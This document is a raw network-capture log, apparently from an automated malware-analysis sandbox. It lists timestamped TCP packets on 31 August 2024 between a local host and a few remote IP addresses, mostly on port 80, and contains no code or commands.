Aug 31, 2024 15:44:20.335608006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335614920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335618019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335652113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335675001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335685968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335695982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335705996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335705996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335719109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335730076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335762978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335762978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339422941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339447975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339459896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339534044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339545012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339561939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339565039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339574099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339589119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339597940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339601994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339616060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339627981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339638948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339648008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339648008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339651108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339663029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339689970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339698076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339714050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.339730024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339775085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339775085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.339992046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340003014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340013981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340069056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.340069056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.340087891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340100050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340111017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340130091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340141058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.340143919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.340143919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.340164900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.340388060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344067097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344201088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344223022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344234943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344255924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344268084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344281912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344283104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344295979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344307899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344316959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344320059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344331026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344341040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344341040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344355106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344366074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344376087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344384909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344391108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344403028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.344407082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344423056 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.344429970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344429970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344477892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.344477892 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.344497919 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.344507933 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.344554901 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.344575882 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.344639063 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.345932007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.345941067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.345952034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346004963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346014977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346024990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346029043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346029043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346038103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346051931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346055031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346061945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346081972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346098900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346111059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346120119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346129894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346133947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346157074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346205950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346221924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346235037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346246958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346256018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.346276045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346410990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.346586943 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.346596956 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.346636057 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.346685886 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.346827984 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.346946955 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.372539997 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:20.392034054 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.392051935 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.392062902 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.392638922 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.422391891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422405958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422418118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422521114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422524929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.422524929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.422532082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422543049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422555923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.422573090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.422580957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424105883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424118042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424128056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424140930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424185038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424185038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424360991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424417019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424428940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424438953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424448013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424463987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424540043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424778938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424789906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424801111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424849987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424853086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424853086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424861908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424874067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424885035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424896955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424900055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424900055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424922943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424937010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424962044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424973965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424974918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.424987078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.424998045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425008059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425014973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425034046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425431967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425443888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425453901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425463915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425465107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425472021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425477982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425487041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425491095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425523996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425602913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425614119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425623894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425637007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425640106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425648928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425661087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425668955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425673008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425684929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425688028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425695896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425699949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425709963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425712109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425724030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425724030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425734043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425740957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425748110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425759077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425759077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425770998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425782919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425798893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.425823927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425834894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.425857067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426045895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426058054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426069021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426078081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426079988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426096916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426100016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426110029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426126957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426265001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426276922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426286936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426295996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426316023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426388979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426399946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426409006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426419973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.426419973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.426445961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.428539991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430403948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430414915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430433035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430444002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430454016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430464983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430471897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430471897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430476904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430490971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430500031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430511951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430521011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430522919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430536985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430541039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430541039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430548906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430560112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430569887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430593014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430610895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430640936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430658102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430686951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430830956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430843115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430862904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430874109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430885077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430887938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430896997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.430915117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430953979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.430953979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.434735060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434832096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434842110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434851885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434863091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434873104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434884071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434894085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434901953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.434906006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434923887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.434931993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.434950113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434963942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434973955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434983015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.434986115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.434997082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.435008049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.435014009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.435020924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.435034990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.435051918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.435051918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436541080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436568975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436664104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436672926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436682940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436695099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436712980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436713934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436724901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436734915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436738014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436747074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436760902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436775923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436794996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436808109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436808109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436808109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436817884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436830044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436842918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436857939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.436985016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.436994076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.437015057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.440531015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.444493055 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444530010 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444582939 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.444632053 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444663048 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.444685936 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.444834948 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444845915 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444858074 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444869995 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444880962 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.444895983 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.445036888 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.445348024 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.445404053 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.445511103 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.494326115 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.494340897 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.494350910 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.495377064 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.495497942 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.495500088 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.495507956 CEST	80	49724	185.215.113.17	192.168.2.5
